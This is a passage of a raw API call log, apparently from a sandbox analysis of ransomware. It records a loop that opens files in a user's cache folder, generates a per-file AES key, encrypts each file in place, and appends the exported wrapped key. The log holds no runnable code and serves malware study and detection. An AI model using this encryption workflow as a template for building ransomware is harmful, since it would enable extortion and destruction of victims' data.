lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.765] CloseHandle (hObject=0x198) returned 1 [0145.788] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.793] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.793] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.793] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.793] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.794] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", dwFileAttributes=0x80) returned 1 [0145.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.795] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=358) returned 1 [0145.795] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=358) returned 1 [0145.795] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.795] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.797] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.797] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.797] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.797] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.797] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x166, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x166, lpOverlapped=0x0) returned 1 [0145.797] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.797] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x166, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x170) returned 1 [0145.797] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.797] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x170, lpOverlapped=0x0) returned 1 [0145.798] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.798] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.798] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.798] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.798] CloseHandle (hObject=0x198) returned 1 [0145.821] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.826] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.826] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.827] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.827] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.827] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", dwFileAttributes=0x80) returned 1 [0145.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.829] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0145.829] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0145.829] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.829] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.830] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.830] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.830] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.830] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.830] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0145.830] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.831] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0145.831] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.831] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0145.831] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.831] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.831] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.831] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.831] CloseHandle (hObject=0x198) returned 1 [0145.852] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.856] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.856] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.856] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406", dwFileAttributes=0x80) returned 1 [0145.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.857] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=268) returned 1 [0145.857] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=268) returned 1 [0145.857] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.857] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.857] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.857] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10c, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x10c, lpOverlapped=0x0) returned 1 [0145.858] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.858] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x10c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x110) returned 1 [0145.858] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.858] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x110, lpOverlapped=0x0) returned 1 [0145.858] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.858] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.858] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.859] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.859] CloseHandle (hObject=0x198) returned 1 [0145.876] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.880] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.880] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.880] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D", dwFileAttributes=0x80) returned 1 [0145.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.881] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=292) returned 1 [0145.881] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=292) returned 1 [0145.881] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.881] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.882] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.882] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.882] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.882] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.882] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x124, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x124, lpOverlapped=0x0) returned 1 [0145.882] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.882] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x124, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x130) returned 1 [0145.882] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.882] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x130, lpOverlapped=0x0) returned 1 [0145.882] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.882] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.882] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.882] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.882] CloseHandle (hObject=0x198) returned 1 [0145.910] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.914] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.914] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.914] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.914] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.914] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D", dwFileAttributes=0x80) returned 1 [0145.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.915] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=220) returned 1 [0145.915] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=220) returned 1 [0145.915] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.915] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.915] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.915] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xdc, lpOverlapped=0x0) returned 1 [0145.916] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.916] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xdc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xe0) returned 1 [0145.916] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.916] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xe0, lpOverlapped=0x0) returned 1 [0145.916] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.916] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.916] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.916] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.916] CloseHandle (hObject=0x198) returned 1 [0145.935] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.939] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.939] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.939] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", dwFileAttributes=0x80) returned 1 [0145.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.940] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=394) returned 1 [0145.940] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=394) returned 1 [0145.940] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.940] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.941] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.941] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.941] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.941] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.941] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18a, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18a, lpOverlapped=0x0) returned 1 [0145.941] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.941] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0145.941] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.941] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0145.941] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.941] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, 